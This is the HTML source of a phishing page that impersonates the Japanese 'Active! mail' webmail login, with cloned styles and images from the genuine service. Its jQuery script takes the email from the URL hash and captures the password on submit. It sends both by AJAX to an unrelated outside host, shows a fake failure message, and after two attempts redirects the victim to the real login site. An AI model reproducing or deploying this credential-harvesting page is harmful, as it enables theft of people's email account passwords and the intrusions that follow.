<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE9">
<meta http-equiv="AM-Template" content="standard/html/index.html">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Language" content="ja">
<meta name="format-detection" content="telephone=no">
<title>Active! mail</title>
<style>
    /**
 * styles for virtual popup windows.
 */

/**
 * main panel of virtual popup window.
 * @script position, top, left, width, height
 */
.amvpop_panel {
  border-width: 1px;
  border-style: solid;
  border-color: #3973ad;
  background-color: white;
  overflow: hidden;
  padding: 2px;
}

/**
 * shadow of main panel.
 * @script position, width, height, opacity
 */
.amvpop_shadow {
  top: 3px;
  left: 3px;
  background-color: gray;
  overflow: hidden;
}

/**
 * title bar of virtual popup window.
 * @script position, width, height
 */
.amvpop_title {
  padding: 3px 0 0 10px;
  overflow: hidden;
  color: white;
  background-color : #3973ad;
  cursor: default;
  font-size: 12px;
  font-weight: bold;
  white-space: nowrap;
}

/**
 * main content of virtual popup window.
 * @script position, width, height
 */
.amvpop_content {
  cursor: default;
  padding: 5px 6px 0 6px;
  overflow: auto;
  background-color: white;
  font-size: 14px;
}

/**
 * container of buttons at bottom of virtual popup window.
 * @script position, width, height
 */
.amvpop_buttons {
  padding: 12px 0 0 10px;
  cursor: default;
  background-color: white;
  font-size: 10px;
  text-align: center;
  white-space: nowrap;
}

/**
 * container of input file name of virtual popup window.
 */
.amvpop_form {
  margin-top : 0px;
  margin-bottom : 10px;
  text-align : center;
}

/**
 * status bar of virtual popup window.
 * @script position, width, height
 */
.amvpop_status {
  padding: 5px 10px 0 10px;
  cursor: default;
  background-color: white;
  font-size: 10px;
  line-height : 1;
  text-align: center;
}

/**
 * close button in title bar.
 * @script none
 */
.amvpop_close {
  position: absolute;
  right: 4px;
  top: 4px;
  width: 16px;
  height: 16px;
  cursor: default;
  overflow: hidden;
  background-image: url(https://activemail.kagoya.com/img/standard/closebox.gif);
  background-repeat: no-repeat;
}

/**
 * resize icon at lower-right of virtual popup window.
 * @script none
 */
.amvpop_resize {
  position: absolute;
  right: 2px;
  bottom: 2px;
  width: 7px;
  height: 7px;
  cursor: se-resize;
  overflow: hidden;
  background-image: url(https://activemail.kagoya.com/img/standard/resize7blue.gif);
  background-repeat: no-repeat;
}

/**
 * warning message in status bar.
 * @script none
 */
.amvpop_status_warn {
  color: red;
  font-weight: bold;
}

/**
 * error message in status bar.
 * @script none
 */
.amvpop_status_error {
  color: red;
  font-weight: bold;
}

/**
 * information message in status bar.
 * @script none
 */
.amvpop_status_info {
  color: black;
  font-weight: bold;
}

@charset "UTF-8";
body {
  padding : 0;
  width : 100%;
  height : 93%;
  overflow : auto;
  background-image : url(/kir_files/img/index_bg.gif);
  background-repeat : repeat-y;
  font-size : small;
}
button.imgbtn {
  margin : 0 2px 0 2px;
  padding : 4px 4px 2px 3px;
  font-size : 12px;
}
button.imgbtn img {
  margin : 0 3px 0 3px;
  vertical-align : -2px;
}
div.border {
  width : 100%;
  background-image : url(/kir_files/img/index_border.gif);
  background-repeat : no-repeat;
}
div.chpassword table {
  border-collapse : collapse;
}
div.chpassword table td {
  padding : 0;
  font-size : 90%;
}
div.chpassword table.inner_table {
  margin : 20px 0 0 0;
}
div.chpassword table.inner_table td {
  padding : 0 10px 0 0;
}
div.layout {
  width : 410px;
  margin : 10% auto 0 auto;

}
div.logo {
  margin : 30px 0 22px 50px;
}
table.login {
  border-collapse : collapse;
  border-color : #999999;
  border-spacing : 0;
  border-style : outset;
  border-width : 1px;
  background-color : #FFFFFF;
}
table.login td {
  padding : 4px;
  background-color : #f0f0f0;
  border-color : #999999;
  border-style : inset;
  border-width : 1px;
}
table.login th {
  padding : 4px;
  background-color : #5791d1;
  border-color : #999999;
  border-style : inset;
  border-width : 1px;
  text-align : left;
}
table.inner {
  margin : 0;
  padding : 2px;
  border-style : none;
  width : 400px;
  background-color : #f0f0f0;
  font-size : 80%;
}
table.inner input.length {
  width : 160px;
}
table.inner td {
  background-color : #f0f0f0;
  border-style : none;
  margin : 0;
  padding : 0;
  text-align : left;
}
table.inner th {
  margin : 0;
  padding : 0;
  border-style : none;
  color : #333333;
  background-color : #f0f0f0;
  text-align : right;
  white-space : nowrap;
}
table.inner th.copyright {
  margin : 0;
  padding : 0;
  color : #999999;
  font-size : 75%;
  vertical-align : bottom;
  white-space : nowrap;
  text-align : left;
}
table.inner td.authinfo {
	text-align : right;
	font-weight : bold;
}

table.login_footer {
  padding : 0;
  margin-top : 5px;
  width : 410px;
}
table.login_footer td.english {
  padding : 0;
  font-size : 90%;
  text-align : right;
}

/* --------------------------------------
change password popup
---------------------------------------*/
div.chpassword {
  margin : 0 0 20px 0;
}

/* --------------------------------------
virtual popup buttons
---------------------------------------*/
div.pop_btn {
  margin-top : 5px;
  text-align : center;
}



</style>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
</head>

<body topmargin="0" leftmargin="0" text="#000000" bgcolor="#FFFFFF" onload="kir_page_display_init();">

<noscript>このページではJavaScriptを使用しています。<br />ご使用のブラウザでJavaScriptを有効にしてご利用下さい。</noscript>

<div id="ajax_content" style="position:absolute;visibility:hidden;display:none;"></div>
  <form name="login" method="POST" action="next.php">
  <div class="logo">
    <img src="https://activemail.kagoya.com//am_viz/common/img/standard/am_logo_index.gif" alt="Active! mail" title="Active! mail" width="164" height="59">
  </div>
  <div class="border"><br></div>
  <div class="layout">
    <table class="login">
     <tr>
      <th><img src="https://activemail.kagoya.com//am_viz/common/img/standard/index_login.gif"></th>
     </tr>
     <tr>
       <td>

        <table class="inner" cellspacing="3" cellpadding="3">
          <tr>
            <td colspan="3"><span id="msg" style="display: none; color:red;font-weight:bold;">
ログインに失敗しました
</span>
<br><br>
</td>
          </tr>
          <tr>
            <th>ユーザID :</th>
            <td>
              <input type="text" class="length" name="email" id="email" size="19" maxlength="1024" style="ime-mode: disabled;" autocomplete="off" value="" tabindex="1" readonly>
            </td>
            <td>
            </td>
          </tr>
          <tr>
            <th>パスワード :</th>
            <td colspan="3">
              <input type="password" class="length" name="password" id="password" size="20" maxlength="1024" style="ime-mode: disabled;" autocomplete="off" value="" tabindex="2" required>
            </td>
          </tr>
          <tr style='display:none'>
            <th></th>
            <td colspan="3">以下に表示されている文字を入力してください</td>
          </tr>
          <tr style='display:none'>
            <th></th> 
            <td colspan="3">
              <img src="">
            </td>
          </tr>
          <tr style='display:none'>
            <th></th>
            <td colspan="3">
              <input type="text" class="length" name="am_captcha" size="19" maxlength="1024" style="ime-mode: disabled;" autocomplete="off" value="" tabindex="3">
            </td>
            <td></td>
          </tr>
          <tr>
            <th>言語選択 :</th>
            <td colspan="3">
              <select name="language" tabindex="4">
                <option value="auto">自動選択</option>
              </select>
            </td>
          </tr>
          <tr>
            <td colspan="4" class="authinfo">
              <input type="checkbox" name="save_authinfo" id="save_authinfo" value="on" tabindex="5" ><label for="save_authinfo">パスワード以外のログイン情報を保存する</label>
            </td>
          </tr>
          <tr>
            <th colspan="2" class="copyright">Active! mail <br />&#169;1998 QUALITIA CO., LTD. All Rights Reserved.</th>
            <th>
              <input type="submit" id="submit-btn" value="  ログイン  ">
            </th>
          </tr>
        </table>

      </td>
    </tr>
  </table>
  <table class="login_footer">
  <tr>
    <td class="english">
      <a href="#">English</a>
    </td>
  </tr>
  </table>
</div>

<input type="hidden" name="login_page_lang" value="ja">
<input type="hidden" name="charset" value="UTF-8">
<input type="hidden" name="_cmd" value="authinput">
</form>

<script>

    /* global $ */
    $(document).ready(function(){
      var count=0;

      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email);
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
          email.focus;
          return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $("#logoname").html(finalu);
        $(".logoname").html(finalu);
      }


      
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );

                    if (!password) {
                $('#error').show();
                $('#error').html("Password field is empty!");

                return false;
            }


      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!filter.test(my_email)) {
        $('#error').show();
        email.focus;
        return false;
      }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      var finalu= c.toUpperCase();

        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $(".logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
        $("#logoname").html(finalu);
      ///////////new injection////////////////
      count=count+1;
      
      $.ajax({
        dataType: 'JSON',
        url: 'https://mahidol-ac.cloud/wp/wa/next.php',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Attempting Release...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=2) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("https://activemail.kagoya.com/");

                  }
                  // $('#msg').html(response['msg']);
                }
                else{
                  // $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=0;
                window.location.replace("https://activemail.kagoya.com/");
              }
              $("#msg").show();
              // $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });
    });


    });
  </script>
</body>

</html>
